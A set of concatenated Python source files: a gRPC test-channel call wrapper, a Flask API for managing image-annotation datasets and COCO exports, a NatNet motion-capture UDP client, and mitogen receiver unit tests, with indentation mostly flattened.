return code
def _details(handler):
unused_trailing_metadata, unused_code, details = handler.termination()
return details
class _Call(grpc.Call):
def __init__(self, handler):
self._handler = handler
def cancel(self):
_cancel(self._handler)
def is_active(self):
return _is_active(self._handler)
def time_remaining(self):
return _time_remaining(self._handler)
def add_callback(self, callback):
return _add_callback(self._handler, callback)
def initial_metadata(self):
return _initial_metadata(self._handler)
def trailing_metadata(self):
return _trailing_metadata(self._handler)
def code(self):
return _code(self._handler)
def details(self):
return _details(self._handler)
class _RpcErrorCall(grpc.RpcError, grpc.Call):
def __init__(self, handler):
self._handler = handler
def cancel(self):
_cancel(self._handler)
def is_active(self):
return _is_active(self._handler)
def time_remaining(self):
return _time_remaining(self._handler)
def add_callback(self, callback):
return _add_callback(self._handler, callback)
def initial_metadata(self):
return _initial_metadata(self._handler)
def trailing_metadata(self):
return _trailing_metadata(self._handler)
def code(self):
return _code(self._handler)
def details(self):
return _details(self._handler)
def _next(handler):
read = handler.take_response()
if read.code is None:
return read.response
elif read.code is grpc.StatusCode.OK:
raise StopIteration()
else:
raise _RpcErrorCall(handler)
class _HandlerExtras(object):
def __init__(self):
self.condition = threading.Condition()
self.unary_response = _NOT_YET_OBSERVED
self.cancelled = False
def _with_extras_cancel(handler, extras):
with extras.condition:
if handler.cancel(grpc.StatusCode.CANCELLED, 'Locally cancelled!'):
extras.cancelled = True
return True
else:
return False
def _extras_without_cancelled(extras):
with extras.condition:
return extras.cancelled
def _running(handler):
return handler.is_active()
def _done(handler):
return not handler.is_active()
def _with_extras_unary_response(handler, extras):
with extras.condition:
if extras.unary_response is _NOT_YET_OBSERVED:
read = handler.take_response()
if read.code is None:
extras.unary_response = read.response
return read.response
else:
raise _RpcErrorCall(handler)
else:
return extras.unary_response
def _exception(unused_handler):
raise NotImplementedError('TODO!')
def _traceback(unused_handler):
raise NotImplementedError('TODO!')
def _add_done_callback(handler, callback, future):
adapted_callback = lambda: callback(future)
if not handler.add_callback(adapted_callback):
callback(future)
class _FutureCall(grpc.Future, grpc.Call):
def __init__(self, handler, extras):
self._handler = handler
self._extras = extras
def cancel(self):
return _with_extras_cancel(self._handler, self._extras)
def cancelled(self):
return _extras_without_cancelled(self._extras)
def running(self):
return _running(self._handler)
def done(self):
return _done(self._handler)
def result(self):
return _with_extras_unary_response(self._handler, self._extras)
def exception(self):
return _exception(self._handler)
def traceback(self):
return _traceback(self._handler)
def add_done_callback(self, fn):
_add_done_callback(self._handler, fn, self)
def is_active(self):
return _is_active(self._handler)
def time_remaining(self):
return _time_remaining(self._handler)
def add_callback(self, callback):
return _add_callback(self._handler, callback)
def initial_metadata(self):
return _initial_metadata(self._handler)
def trailing_metadata(self):
return _trailing_metadata(self._handler)
def code(self):
return _code(self._handler)
def details(self):
return _details(self._handler)
def consume_requests(request_iterator, handler):
def _consume():
while True:
try:
request = next(request_iterator)
added = handler.add_request(request)
if not added:
break
except StopIteration:
handler.close_requests()
break
except Exception: # pylint: disable=broad-except
details = 'Exception iterating requests!'
_LOGGER.exception(details)
handler.cancel(grpc.StatusCode.UNKNOWN, details)
consumption = threading.Thread(target=_consume)
consumption.start()
def blocking_unary_response(handler):
read = handler.take_response()
if read.code is None:
unused_trailing_metadata, code, unused_details = handler.termination()
if code is grpc.StatusCode.OK:
return read.response
else:
raise _RpcErrorCall(handler)
else:
raise _RpcErrorCall(handler)
def blocking_unary_response_with_call(handler):
read = handler.take_response()
if read.code is None:
unused_trailing_metadata, code, unused_details = handler.termination()
if code is grpc.StatusCode.OK:
return read.response, _Call(handler)
else:
raise _RpcErrorCall(handler)
else:
raise _RpcErrorCall(handler)
def future_call(handler):
return _FutureCall(handler, _HandlerExtras())
class ResponseIteratorCall(grpc.Call):
def __init__(self, handler):
self._handler = handler
def __iter__(self):
return self
def __next__(self):
return _next(self._handler)
def next(self):
return _next(self._handler)
def cancel(self):
_cancel(self._handler)
def is_active(self):
return _is_active(self._handler)
def time_remaining(self):
return _time_remaining(self._handler)
def add_callback(self, callback):
return _add_callback(self._handler, callback)
def initial_metadata(self):
return _initial_metadata(self._handler)
def trailing_metadata(self):
return _trailing_metadata(self._handler)
def code(self):
return _code(self._handler)
def details(self):
return _details(self._handler)
|
datasets.py
|
from flask import request
from flask_restplus import Namespace, Resource, reqparse, inputs
from flask_login import login_required, current_user
from werkzeug.datastructures import FileStorage
from mongoengine.errors import NotUniqueError
from mongoengine.queryset.visitor import Q
from threading import Thread
from google_images_download import google_images_download as gid
from ..util.pagination_util import Pagination
from ..util import query_util, coco_util, profile
from database import (
    ImageModel,
    DatasetModel,
    CategoryModel,
    AnnotationModel,
    ExportModel,
    CocoImportModel
)
import datetime
import json
import os
api = Namespace('dataset', description='Dataset related operations')
dataset_create = reqparse.RequestParser()
dataset_create.add_argument('name', required=True)
dataset_create.add_argument('categories', type=list, required=False, location='json',
help="List of default categories for sub images")
page_data = reqparse.RequestParser()
page_data.add_argument('page', default=1, type=int)
page_data.add_argument('limit', default=20, type=int)
page_data.add_argument('folder', default='', help='Folder for data')
page_data.add_argument('order', default='file_name', help='Order to display images')
delete_data = reqparse.RequestParser()
delete_data.add_argument('fully', default=False, type=bool,
help="Fully delete dataset (no undo)")
coco_upload = reqparse.RequestParser()
coco_upload.add_argument('coco', location='files', type=FileStorage, required=True, help='Json coco')
export = reqparse.RequestParser()
export.add_argument('categories', type=str, default=None, required=False, help='Ids of categories to export')
export.add_argument('with_empty_images', type=inputs.boolean, default=False, required=False, help='Export with un-annotated images')
update_dataset = reqparse.RequestParser()
update_dataset.add_argument('categories', location='json', type=list, help="New list of categories")
update_dataset.add_argument('default_annotation_metadata', location='json', type=dict,
help="Default annotation metadata")
dataset_generate = reqparse.RequestParser()
dataset_generate.add_argument('keywords', location='json', type=list, default=[],
help="Keywords associated with images")
dataset_generate.add_argument('limit', location='json', type=int, default=100, help="Number of images per keyword")
share = reqparse.RequestParser()
share.add_argument('users', location='json', type=list, default=[], help="List of users")
@api.route('/')
class Dataset(Resource):
@login_required
def get(self):
""" Returns all datasets """
return query_util.fix_ids(current_user.datasets.filter(deleted=False).all())
@api.expect(dataset_create)
@login_required
def post(self):
""" Creates a dataset """
args = dataset_create.parse_args()
name = args['name']
categories = args.get('categories', [])
category_ids = CategoryModel.bulk_create(categories)
try:
dataset = DatasetModel(name=name, categories=category_ids)
dataset.save()
except NotUniqueError:
return {'message': 'Dataset already exists. Check the undo tab to fully delete the dataset.'}, 400
return query_util.fix_ids(dataset)
def download_images(output_dir, args):
for keyword in args['keywords']:
response = gid.googleimagesdownload()
response.download({
"keywords": keyword,
"limit": args['limit'],
"output_directory": output_dir,
"no_numbering": True,
"format": "jpg",
"type": "photo",
"print_urls": False,
"print_paths": False,
"print_size": False
})
@api.route('/<int:dataset_id>/generate')
class DatasetGenerate(Resource):
@api.expect(dataset_generate)
@login_required
def post(self, dataset_id):
""" Adds images found on google to the dataset """
args = dataset_generate.parse_args()
dataset = current_user.datasets.filter(id=dataset_id, deleted=False).first()
if dataset is None:
return {"message": "Invalid dataset id"}, 400
if not dataset.is_owner(current_user):
return {"message": "You do not have permission to download the dataset's annotations"}, 403
thread = Thread(target=download_images, args=(dataset.directory, args))
thread.start()
return {"success": True}
@api.route('/<int:dataset_id>/users')
class DatasetMembers(Resource):
@login_required
def get(self, dataset_id):
""" All users in the dataset """
args = dataset_generate.parse_args()
dataset = current_user.datasets.filter(id=dataset_id, deleted=False).first()
if dataset is None:
return {"message": "Invalid dataset id"}, 400
users = dataset.get_users()
return query_util.fix_ids(users)
@api.route('/<int:dataset_id>/reset/metadata')
class DatasetCleanMeta(Resource):
@login_required
def get(self, dataset_id):
""" All users in the dataset """
args = dataset_generate.parse_args()
dataset = current_user.datasets.filter(id=dataset_id, deleted=False).first()
if dataset is None:
return {"message": "Invalid dataset id"}, 400
AnnotationModel.objects(dataset_id=dataset.id)\
.update(metadata=dataset.default_annotation_metadata)
ImageModel.objects(dataset_id=dataset.id)\
.update(metadata={})
return {'success': True}
@api.route('/<int:dataset_id>/stats')
class DatasetStats(Resource):
@login_required
def get(self, dataset_id):
""" All users in the dataset """
args = dataset_generate.parse_args()
dataset = current_user.datasets.filter(id=dataset_id, deleted=False).first()
if dataset is None:
return {"message": "Invalid dataset id"}, 400
images = ImageModel.objects(dataset_id=dataset.id, deleted=False)
annotated_images = images.filter(annotated=True)
annotations = AnnotationModel.objects(dataset_id=dataset_id, deleted=False)
# Calculate annotation counts by category in this dataset
category_count = dict()
image_category_count = dict()
for category in dataset.categories:
# Calculate the annotation count in the current category in this dataset
cat_name = CategoryModel.objects(id=category).first()['name']
cat_count = AnnotationModel.objects(dataset_id=dataset_id, category_id=category, deleted=False).count()
category_count.update({str(cat_name): cat_count})
# Calculate the annotated images count in the current category in this dataset
image_count = len(AnnotationModel.objects(dataset_id=dataset_id, category_id=category, deleted=False).distinct('image_id'))
image_category_count.update({str(cat_name): image_count})
stats = {
'total': {
'Users': dataset.get_users().count(),
'Images': images.count(),
'Annotated Images': annotated_images.count(),
'Annotations': annotations.count(),
'Categories': len(dataset.categories),
'Time Annotating (s)': (images.sum('milliseconds') or 0) / 1000
},
'average': {
'Image Size (px)': images.average('width'),
'Image Height (px)': images.average('height'),
'Annotation Area (px)': annotations.average('area'),
'Time (ms) per Image': images.average('milliseconds') or 0,
'Time (ms) per Annotation': annotations.average('milliseconds') or 0
},
'categories': category_count,
'images_per_category': image_category_count
}
return stats
@api.route('/<int:dataset_id>')
class DatasetId(Resource):
@login_required
def delete(self, dataset_id):
""" Deletes dataset by ID (only owners)"""
dataset = DatasetModel.objects(id=dataset_id, deleted=False).first()
if dataset is None:
return {"message": "Invalid dataset id"}, 400
if not current_user.can_delete(dataset):
return {"message": "You do not have permission to delete the dataset"}, 403
dataset.update(set__deleted=True, set__deleted_date=datetime.datetime.now())
return {"success": True}
@api.expect(update_dataset)
def post(self, dataset_id):
""" Updates dataset by ID """
dataset = current_user.datasets.filter(id=dataset_id, deleted=False).first()
if dataset is None:
return {"message": "Invalid dataset id"}, 400
args = update_dataset.parse_args()
categories = args.get('categories')
default_annotation_metadata = args.get('default_annotation_metadata')
set_default_annotation_metadata = args.get('set_default_annotation_metadata')
if categories is not None:
dataset.categories = CategoryModel.bulk_create(categories)
if default_annotation_metadata is not None:
update = {}
for key, value in default_annotation_metadata.items():
if key not in dataset.default_annotation_metadata:
update[f'set__metadata__{key}'] = value
dataset.default_annotation_metadata = default_annotation_metadata
if len(update.keys()) > 0:
AnnotationModel.objects(dataset_id=dataset.id, deleted=False)\
.update(**update)
dataset.update(
categories=dataset.categories,
default_annotation_metadata=dataset.default_annotation_metadata
)
return {"success": True}
@api.route('/<int:dataset_id>/share')
class DatasetIdShare(Resource):
@api.expect(share)
@login_required
def post(self, dataset_id):
args = share.parse_args()
dataset = current_user.datasets.filter(id=dataset_id, deleted=False).first()
if dataset is None:
return {"message": "Invalid dataset id"}, 400
if not dataset.is_owner(current_user):
return {"message": "You do not have permission to share this dataset"}, 403
dataset.update(users=args.get('users'))
return {"success": True}
@api.route('/data')
class DatasetData(Resource):
@api.expect(page_data)
@login_required
def get(self):
""" Endpoint called by dataset viewer client """
args = page_data.parse_args()
limit = args['limit']
page = args['page']
folder = args['folder']
datasets = current_user.datasets.filter(deleted=False)
pagination = Pagination(datasets.count(), limit, page)
datasets = datasets[pagination.start:pagination.end]
datasets_json = []
for dataset in datasets:
dataset_json = query_util.fix_ids(dataset)
images = ImageModel.objects(dataset_id=dataset.id, deleted=False)
dataset_json['numberImages'] = images.count()
dataset_json['numberAnnotated'] = images.filter(annotated=True).count()
dataset_json['permissions'] = dataset.permissions(current_user)
first = images.first()
if first is not None:
dataset_json['first_image_id'] = images.first().id
datasets_json.append(dataset_json)
return {
"pagination": pagination.export(),
"folder": folder,
"datasets": datasets_json,
"categories": query_util.fix_ids(current_user.categories.filter(deleted=False).all())
}
@api.route('/<int:dataset_id>/data')
class DatasetDataId(Resource):
@profile
@api.expect(page_data)
@login_required
def get(self, dataset_id):
""" Endpoint called by image viewer client """
parsed_args = page_data.parse_args()
per_page = parsed_args.get('limit')
page = parsed_args.get('page') - 1
folder = parsed_args.get('folder')
order = parsed_args.get('order')
args = dict(request.args)
# Check if dataset exists
dataset = current_user.datasets.filter(id=dataset_id, deleted=False).first()
if dataset is None:
            return {'message': 'Invalid dataset id'}, 400
        # Make sure the folder path is in the proper format
if len(folder) > 0:
folder = folder[0].strip('/') + folder[1:]
if folder[-1] != '/':
folder = folder + '/'
# Get directory
directory = os.path.join(dataset.directory, folder)
if not os.path.exists(directory):
return {'message': 'Directory does not exist.'}, 400
# Remove parsed arguments
for key in parsed_args:
args.pop(key, None)
        # Generate query from remaining arguments
query = {}
for key, value in args.items():
lower = value.lower()
if lower in ["true", "false"]:
value = json.loads(lower)
if len(lower) != 0:
query[key] = value
# Change category_ids__in to list
if 'category_ids__in' in query.keys():
query['category_ids__in'] = [int(x) for x in query['category_ids__in'].split(',')]
# Initialize mongo query with required elements:
query_build = Q(dataset_id=dataset_id)
query_build &= Q(path__startswith=directory)
query_build &= Q(deleted=False)
# Define query names that should use complex logic:
complex_query = ['annotated', 'category_ids__in']
# Add additional 'and' arguments to mongo query that do not require complex_query logic
for key in query.keys():
if key not in complex_query:
query_dict = {}
query_dict[key] = query[key]
query_build &= Q(**query_dict)
# Add additional arguments to mongo query that require more complex logic to construct
if 'annotated' in query.keys():
if 'category_ids__in' in query.keys() and query['annotated']:
# Only show annotated images with selected category_ids
query_dict = {}
query_dict['category_ids__in'] = query['category_ids__in']
query_build &= Q(**query_dict)
else:
# Only show non-annotated images
query_dict = {}
query_dict['annotated'] = query['annotated']
query_build &= Q(**query_dict)
elif 'category_ids__in' in query.keys():
            # Show annotated images with selected category_ids or non-annotated images
query_dict_1 = {}
query_dict_1['category_ids__in'] = query['category_ids__in']
query_dict_2 = {}
query_dict_2['annotated'] = False
query_build &= (Q(**query_dict_1) | Q(**query_dict_2))
# Perform mongodb query
images = current_user.images \
.filter(query_build) \
.order_by(order).only('id', 'file_name', 'annotating', 'annotated', 'num_annotations')
total = images.count()
pages = int(total/per_page) + 1
images = images.skip(page*per_page).limit(per_page)
images_json = query_util.fix_ids(images)
# for image in images:
# image_json = query_util.fix_ids(image)
# query = AnnotationModel.objects(image_id=image.id, deleted=False)
# category_ids = query.distinct('category_id')
# categories = CategoryModel.objects(id__in=category_ids).only('name', 'color')
# image_json['annotations'] = query.count()
# image_json['categories'] = query_util.fix_ids(categories)
# images_json.append(image_json)
subdirectories = [f for f in sorted(os.listdir(directory))
if os.path.isdir(directory + f) and not f.startswith('.')]
categories = CategoryModel.objects(id__in=dataset.categories).only('id', 'name')
return {
"total": total,
"per_page": per_page,
"pages": pages,
"page": page,
"images": images_json,
"folder": folder,
"directory": directory,
"dataset": query_util.fix_ids(dataset),
"categories": query_util.fix_ids(categories),
"subdirectories": subdirectories
}
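    # Illustrative sketch (not part of the original endpoint): any extra query-string
    # parameters are folded into the MongoEngine query built above, so a request such as
    #   GET .../dataset/<dataset_id>/data?page=2&limit=50&annotated=true&category_ids__in=3,7
    # (the exact URL prefix depends on how this namespace is registered) ends up roughly as
    #   Q(dataset_id=dataset_id) & Q(path__startswith=directory) & Q(deleted=False)
    #       & Q(category_ids__in=[3, 7])
    # because 'annotated' combined with 'category_ids__in' takes the first branch of the
    # complex-query handling.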
@api.route('/<int:dataset_id>/exports')
class DatasetExports(Resource):
@login_required
def get(self, dataset_id):
""" Returns exports of images and annotations in the dataset (only owners) """
dataset = current_user.datasets.filter(id=dataset_id).first()
if dataset is None:
return {"message": "Invalid dataset ID"}, 400
if not current_user.can_download(dataset):
return {"message": "You do not have permission to download the dataset's annotations"}, 403
exports = ExportModel.objects(dataset_id=dataset.id).order_by('-created_at').limit(50)
dict_export = []
for export in exports:
time_delta = datetime.datetime.utcnow() - export.created_at
dict_export.append({
'id': export.id,
'ago': query_util.td_format(time_delta),
'tags': export.tags
})
return dict_export
@api.route('/<int:dataset_id>/export')
class DatasetExport(Resource):
@api.expect(export)
@login_required
def get(self, dataset_id):
args = export.parse_args()
categories = args.get('categories')
with_empty_images = args.get('with_empty_images', False)
        if categories is None or len(categories) == 0:
            categories = []
        elif isinstance(categories, str):
            categories = [int(c) for c in categories.split(',')]
dataset = DatasetModel.objects(id=dataset_id).first()
if not dataset:
return {'message': 'Invalid dataset ID'}, 400
return dataset.export_coco(categories=categories, with_empty_images=with_empty_images)
@api.expect(coco_upload)
@login_required
def post(self, dataset_id):
""" Adds coco formatted annotations to the dataset """
args = coco_upload.parse_args()
coco = args['coco']
dataset = current_user.datasets.filter(id=dataset_id).first()
if dataset is None:
return {'message': 'Invalid dataset ID'}, 400
return dataset.import_coco(json.load(coco))
@api.route('/<int:dataset_id>/coco')
class DatasetCoco(Resource):
@login_required
def get(self, dataset_id):
""" Returns coco of images and annotations in the dataset (only owners) """
dataset = current_user.datasets.filter(id=dataset_id).first()
if dataset is None:
return {"message": "Invalid dataset ID"}, 400
if not current_user.can_download(dataset):
return {"message": "You do not have permission to download the dataset's annotations"}, 403
return coco_util.get_dataset_coco(dataset)
@api.expect(coco_upload)
@login_required
def post(self, dataset_id):
""" Adds coco formatted annotations to the dataset """
args = coco_upload.parse_args()
coco = args['coco']
dataset = current_user.datasets.filter(id=dataset_id).first()
if dataset is None:
return {'message': 'Invalid dataset ID'}, 400
return dataset.import_coco(json.load(coco))
@api.route('/coco/<int:import_id>')
class DatasetCocoId(Resource):
@login_required
def get(self, import_id):
""" Returns current progress and errors of a coco import """
coco_import = CocoImportModel.objects(
id=import_id, creator=current_user.username).first()
if not coco_import:
return {'message': 'No such coco import'}, 400
return {
"progress": coco_import.progress,
"errors": coco_import.errors
}
@api.route('/<int:dataset_id>/scan')
class DatasetScan(Resource):
@login_required
def get(self, dataset_id):
dataset = DatasetModel.objects(id=dataset_id).first()
if not dataset:
return {'message': 'Invalid dataset ID'}, 400
return dataset.scan()
|
nat_net_client.py
|
import socket
from threading import Thread
import time
from typing import Optional
from .data_frame import DataFrame
from .event import Event
from .server_info import ServerInfo
from .data_descriptions import DataDescriptions
from .packet_buffer import PacketBuffer
from .version import Version
class NatNetError(Exception):
pass
class NatNetProtocolError(NatNetError):
pass
class NatNetClient:
# Client/server message ids
NAT_CONNECT = 0
NAT_SERVERINFO = 1
NAT_REQUEST = 2
NAT_RESPONSE = 3
NAT_REQUEST_MODELDEF = 4
NAT_MODELDEF = 5
NAT_REQUEST_FRAMEOFDATA = 6
NAT_FRAMEOFDATA = 7
NAT_MESSAGESTRING = 8
NAT_DISCONNECT = 9
NAT_KEEPALIVE = 10
NAT_UNRECOGNIZED_REQUEST = 100
def __init__(self, server_ip_address: str = "127.0.0.1", local_ip_address: str = "127.0.0.1",
multicast_address: str = "239.255.42.99", command_port: int = 1510, data_port: int = 1511,
use_multicast: bool = True):
self.__server_ip_address = server_ip_address
self.__local_ip_address = local_ip_address
self.__multicast_address = multicast_address
self.__command_port = command_port
self.__data_port = data_port
self.__use_multicast = use_multicast
self.__server_info = None
# NatNet stream version. This will be updated to the actual version the server is using during runtime.
self.__current_protocol_version: Optional[Version] = None
self.__command_thread = None
self.__data_thread = None
self.__command_socket: Optional[socket.socket] = None
self.__data_socket: Optional[socket.socket] = None
self.__stop_threads = False
self.__on_data_frame_received_event = Event()
self.__on_data_description_received_event = Event()
@property
def connected(self):
return self.__command_socket is not None and self.__data_socket is not None and self.__server_info is not None
# Create a command socket to attach to the NatNet stream
def __create_command_socket(self):
if self.__use_multicast:
# Multicast case
result = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
# allow multiple clients on same machine to use multicast group address/port
result.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
result.bind(("", 0))
except socket.error as ex:
print("Command socket error occurred:\n{}\nCheck Motive/Server mode requested mode agreement. "
"You requested Multicast".format(ex))
# set to broadcast mode
result.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
else:
# Unicast case
result = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
try:
result.bind((self.__local_ip_address, 0))
except socket.error as ex:
print("Command socket error occurred:\n{}\nCheck Motive/Server mode requested mode agreement. "
"You requested Multicast".format(ex))
result.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
result.settimeout(0.0)
return result
# Create a data socket to attach to the NatNet stream
def __create_data_socket(self, port):
if self.__use_multicast:
# Multicast case
result = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0) # UDP
result.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
result.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP,
socket.inet_aton(self.__multicast_address) + socket.inet_aton(self.__local_ip_address))
try:
result.bind((self.__local_ip_address, port))
except socket.error as ex:
print("Command socket error occurred:\n{}\nCheck Motive/Server mode requested mode agreement. "
"You requested Multicast".format(ex))
else:
# Unicast case
result = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
result.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
result.bind(("", 0))
except socket.error as ex:
print("Command socket error occurred:\n{}\nCheck Motive/Server mode requested mode agreement. "
"You requested Multicast".format(ex))
if self.__multicast_address != "255.255.255.255":
result.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP,
socket.inet_aton(self.__multicast_address) + socket.inet_aton(
self.__local_ip_address))
result.settimeout(0.0)
return result
def __socket_thread_func(self, in_socket: socket.socket, recv_buffer_size: int = 64 * 1024,
send_keep_alive: bool = False):
while not self.__stop_threads:
# Use timeout to ensure that thread can terminate
self.__process_socket(in_socket, recv_buffer_size=recv_buffer_size, send_keep_alive=send_keep_alive)
def __process_socket(self, in_socket: socket.socket, recv_buffer_size: int = 64 * 1024,
send_keep_alive: bool = False):
if send_keep_alive:
self.send_request(self.NAT_KEEPALIVE)
try:
data, addr = in_socket.recvfrom(recv_buffer_size)
if len(data) > 0:
self.__process_message(PacketBuffer(data))
return True
except (BlockingIOError, socket.timeout):
pass
return False
def __process_message(self, buffer: PacketBuffer):
message_id = buffer.read_uint16()
packet_size = buffer.read_uint16()
if len(buffer.data) - 4 != packet_size:
print("Warning: actual packet size ({}) not consistent with packet size in the header ({})".format(
len(buffer.data) - 4, packet_size))
if message_id == self.NAT_FRAMEOFDATA:
data_frame = DataFrame.read_from_buffer(buffer, self.__current_protocol_version)
self.__on_data_frame_received_event.call(data_frame)
elif message_id == self.NAT_MODELDEF:
data_descs = DataDescriptions.read_from_buffer(buffer, self.__current_protocol_version)
self.__on_data_description_received_event.call(data_descs)
elif message_id == self.NAT_SERVERINFO:
self.__server_info = ServerInfo.read_from_buffer(buffer, self.__current_protocol_version)
self.__current_protocol_version = self.__server_info.nat_net_protocol_version
return message_id
def send_request(self, command: int, command_str: str = ""):
if command in [self.NAT_REQUEST_MODELDEF, self.NAT_REQUEST_FRAMEOFDATA, self.NAT_KEEPALIVE]:
command_str = ""
if command == self.NAT_CONNECT:
command_str = "Ping"
packet_size = len(command_str) + 1
data = command.to_bytes(2, byteorder="little")
data += packet_size.to_bytes(2, byteorder="little")
data += command_str.encode("utf-8")
data += b"\0"
return self.__command_socket.sendto(data, (self.__server_ip_address, self.__command_port))
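    # Illustrative sketch (not part of the original class): for NAT_CONNECT the request
    # built above is little-endian <message id><payload size><NUL-terminated payload>,
    # i.e. b'\x00\x00' + b'\x05\x00' + b'Ping\x00' (command 0, payload size 5).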
def request_modeldef(self):
self.send_request(self.NAT_REQUEST_MODELDEF)
def send_command(self, command_str: str):
if not self.connected:
raise NatNetError("NatNet client is not connected to a server.")
return self.send_request(self.NAT_REQUEST, command_str)
def connect(self, timeout: float = 5.0):
if not self.connected:
self.__data_socket = self.__create_data_socket(self.__data_port)
self.__command_socket = self.__create_command_socket()
# Get NatNet and server versions
self.send_request(self.NAT_CONNECT)
start_time = time.time()
while self.__server_info is None:
# Waiting for reply from server
self.__process_socket(self.__command_socket, send_keep_alive=not self.__use_multicast)
if (time.time() - start_time) >= timeout:
self.shutdown()
raise TimeoutError()
time.sleep(0.1)
def run_async(self):
if not self.running_asynchronously:
self.__stop_threads = False
# To ensure that threads can terminate
self.__data_socket.settimeout(0.1)
self.__command_socket.settimeout(0.1)
# Create a separate thread for receiving data packets
self.__data_thread = Thread(target=self.__socket_thread_func, args=(self.__data_socket,))
self.__data_thread.start()
# Create a separate thread for receiving command packets
self.__command_thread = Thread(
target=self.__socket_thread_func, args=(self.__command_socket,),
kwargs={"send_keep_alive": not self.__use_multicast})
self.__command_thread.start()
def stop_async(self):
if self.running_asynchronously:
self.__stop_threads = True
if self.__command_thread is not None:
self.__command_thread.join()
if self.__data_thread is not None:
self.__data_thread.join()
self.__command_thread = self.__data_thread = None
self.__data_socket.settimeout(0.0)
self.__command_socket.settimeout(0.0)
def update_sync(self):
assert not self.running_asynchronously, "Cannot update synchronously while running asynchronously."
while self.__process_socket(self.__data_socket):
pass
while self.__process_socket(self.__command_socket, send_keep_alive=not self.__use_multicast):
pass
def shutdown(self):
self.stop_async()
if self.__command_socket is not None:
self.__command_socket.close()
if self.__data_socket is not None:
self.__data_socket.close()
self.__command_socket = self.__data_socket = self.__server_info = None
def __enter__(self):
self.connect()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.shutdown()
@property
def on_data_frame_received_event(self) -> Event:
return self.__on_data_frame_received_event
@property
def on_data_description_received_event(self) -> Event:
return self.__on_data_description_received_event
@property
def server_info(self) -> Optional[ServerInfo]:
return self.__server_info
@property
def can_change_protocol_version(self) -> bool:
if self.__server_info is not None:
return self.__server_info.nat_net_protocol_version >= Version(4) and not self.__use_multicast
return False
@property
def protocol_version(self) -> Optional[Version]:
return self.__current_protocol_version
@protocol_version.setter
def protocol_version(self, desired_version: Version):
if not self.can_change_protocol_version:
raise NatNetProtocolError("Server does not support changing the NatNet protocol version.")
desired_version = desired_version.truncate(2)
if self.can_change_protocol_version and desired_version != self.__current_protocol_version.truncate(2):
sz_command = "Bitstream,{}".format(desired_version)
return_code = self.send_command(sz_command)
if return_code >= 0:
self.__current_protocol_version = desired_version
self.send_command("TimelinePlay")
time.sleep(0.1)
for cmd in ["TimelinePlay", "TimelineStop", "SetPlaybackCurrentFrame,0", "TimelineStop"]:
self.send_command(cmd)
time.sleep(2)
else:
raise NatNetProtocolError("Failed to set NatNet protocol version")
@property
def server_ip_address(self) -> str:
return self.__server_ip_address
@property
def local_ip_address(self) -> str:
return self.__local_ip_address
@property
def multicast_address(self) -> str:
return self.__multicast_address
@property
def command_port(self) -> int:
return self.__command_port
@property
def data_port(self) -> int:
return self.__data_port
@property
def use_multicast(self) -> bool:
return self.__use_multicast
@property
def running_asynchronously(self):
return self.__command_thread is not None or self.__data_thread is not None
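# Illustrative usage sketch (not part of the original module; the exact Event
# subscription API lives in the local .event module and may differ from what is
# shown here):
#
#   def on_frame(frame):                      # receives a DataFrame instance
#       print(frame)
#
#   client = NatNetClient(server_ip_address="127.0.0.1", use_multicast=True)
#   client.on_data_frame_received_event.register(on_frame)   # hypothetical Event method
#   with client:                              # __enter__ -> connect(), __exit__ -> shutdown()
#       client.request_modeldef()
#       client.run_async()                    # or poll with client.update_sync() in a loop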
|
receiver_test.py
|
import sys
import threading
import unittest
import mitogen.core
import testlib
def yield_stuff_then_die(sender):
for x in range(5):
sender.send(x)
sender.close()
return 10
class ConstructorTest(testlib.RouterMixin, testlib.TestCase):
def test_handle(self):
recv = mitogen.core.Receiver(self.router)
self.assertTrue(isinstance(recv.handle, int))
self.assertTrue(recv.handle > 100)
self.router.route(
mitogen.core.Message.pickled(
'hi',
dst_id=0,
handle=recv.handle,
)
)
self.assertEqual('hi', recv.get().unpickle())
class IterationTest(testlib.RouterMixin, testlib.TestCase):
def test_dead_stops_iteration(self):
recv = mitogen.core.Receiver(self.router)
fork = self.router.local()
ret = fork.call_async(yield_stuff_then_die, recv.to_sender())
self.assertEqual(list(range(5)), list(m.unpickle() for m in recv))
self.assertEqual(10, ret.get().unpickle())
def iter_and_put(self, recv, latch):
try:
for msg in recv:
latch.put(msg)
except Exception:
latch.put(sys.exc_info()[1])
def test_close_stops_iteration(self):
recv = mitogen.core.Receiver(self.router)
latch = mitogen.core.Latch()
t = threading.Thread(
target=self.iter_and_put,
args=(recv, latch),
)
t.start()
t.join(0.1)
recv.close()
t.join()
self.assertTrue(latch.empty())
class CloseTest(testlib.RouterMixin, testlib.TestCase):
def wait(self, latch, wait_recv):
try:
latch.put(wait_recv.get())
except Exception:
latch.put(sys.exc_info()[1])
def test_closes_one(self):
latch = mitogen.core.Latch()
wait_recv = mitogen.core.Receiver(self.router)
t = threading.Thread(target=lambda: self.wait(latch, wait_recv))
t.start()
wait_recv.close()
def throw():
raise latch.get()
t.join()
e = self.assertRaises(mitogen.core.ChannelError, throw)
self.assertEqual(e.args[0], mitogen.core.Receiver.closed_msg)
def test_closes_all(self):
latch = mitogen.core.Latch()
wait_recv = mitogen.core.Receiver(self.router)
ts = [
threading.Thread(target=lambda: self.wait(latch, wait_recv))
for x in range(5)
]
for t in ts:
t.start()
wait_recv.close()
def throw():
raise latch.get()
for x in range(5):
e = self.assertRaises(mitogen.core.ChannelError, throw)
self.assertEqual(e.args[0], mitogen.core.Receiver.closed_msg)
for t in ts:
t.join()
class OnReceiveTest(testlib.RouterMixin, testlib.TestCase):
# Verify behaviour of _on_receive dead message handling. A dead message
# should unregister the receiver and wake all threads.
def wait(self, latch, wait_recv):
try:
latch.put(wait_recv.get())
except Exception:
latch.put(sys.exc_info()[1])
def test_sender_closes_one_thread(self):
latch = mitogen.core.Latch()
